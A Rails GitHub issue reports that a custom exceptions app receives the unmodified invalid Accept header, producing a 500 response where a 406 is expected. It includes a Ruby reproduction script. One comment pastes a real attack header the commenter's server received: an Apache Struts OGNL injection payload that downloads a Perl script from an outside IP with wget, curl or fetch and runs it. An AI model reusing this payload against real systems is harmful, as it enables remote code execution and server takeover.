### ISSUE TITLE
ActionDispatch handles Mime::Type::InvalidMimeType incorrectly when a custom exceptions app is specified

### ISSUE THREAD

**Issue by danderozier** [rails/rails#38341]
Typically, the ActionDispatch::ShowExceptions middleware will rescue exceptions and pass the request along to the exceptions app to handle the exception as desired. 

If the exception is a Mime::Type::InvalidMimeType, though, there is a problem — ActionDispatch::ShowExceptions passes the request along to the exceptions app without changing the bad 'Accept' header that triggered the exception to begin with.

With the default exceptions app, this isn't a problem: ActionDispatch::PublicExceptions will specifically rescue Mime::Type::InvalidMimeType and fix the header before passing the request along:

https://github.com/rails/rails/blob/98a57aa5f610bc66af31af409c72173cdeeb3c9e/actionpack/lib/action_dispatch/middleware/public_exceptions.rb#L27

But when a custom exceptions app is specified, calling the exceptions app with the bad 'Accept' header just raises another Mime::Type::InvalidMimeType, which this time is handled by ActionDispatch::ShowExceptions' failsafe 500 response. The custom exceptions app won't handle the request, and instead of a 406 response, you get a 500.

This actually came up before [in this PR](https://github.com/rails/rails/pull/35766), but was closed under the argument that middleware shouldn't handle specific exceptions.

I would argue, however, that it's the middleware's responsibility to ensure it isn't knowingly providing the exceptions app with an invalid request: when Mime::Type::InvalidMimeType is raised, it's due to a bad header that, if left unmodified, will always result in a failsafe response. 

As far as I'm aware, Mime::Type::InvalidMimeType is the only exception that has to be explicitly rescued by the exceptions app in order to handle it.

### Steps to reproduce
```ruby
# frozen_string_literal: true

require "bundler/inline"

gemfile(true) do
  source "https://rubygems.org"

  gem "rails", '6.0.2.1'
end

require "action_controller/railtie"

class TestApp < Rails::Application
  config.root = __dir__
  config.hosts << "example.org"
  secrets.secret_key_base = "secret_key_base"

  config.logger = Logger.new($stdout)
  Rails.logger  = config.logger

  # Required to handle exceptions in tests
  config.action_dispatch.show_exceptions = true

  # Custom exceptions app
  config.exceptions_app = routes

  routes.draw do
    get "/" => "test#index"

    # Using routes as exceptions app, handle 406 errors
    match "/406" => "test#index", :via => :all
  end
end

class TestController < ActionController::Base
  include Rails.application.routes.url_helpers

  def index
    render plain: "Home"
  end
end

require "minitest/autorun"
require "rack/test"

class BugTest < Minitest::Test
  include Rack::Test::Methods

  # This will fail
  def test_should_return_406_not_acceptable
    header 'Accept', 'Invalid Mime Type'
    get "/"
    assert_equal 406, last_response.status
  end

  private
    def app
      Rails.application
    end
end
```

### Expected behavior
The test above should pass — the request should be handled by the custom exceptions app (in this case, the router).

### Actual behavior
The test fails — passing the request to the router raises another Mime::Type::InvalidMimeType exception and triggers a failsafe 500 response.

### System configuration
**Rails version**: 6.0.1.2

**Ruby version**: 2.6.5

**Comment by stuckyi-slayer** [comment]
in Rails 6.0.2.2, using custom error routing. 
it occured by request with invalid header. we got this content_type. 
it handled as 500 error.

## Invalid Content Type
`
* CONTENT_TYPE                                            : %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http://80.68.196.6/lol | perl ; cd /tmp ; curl -O http://80.68.196.6/lol ; fetch http://80.68.196.6/lol ; perl lol ;rm -rf lol*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
`
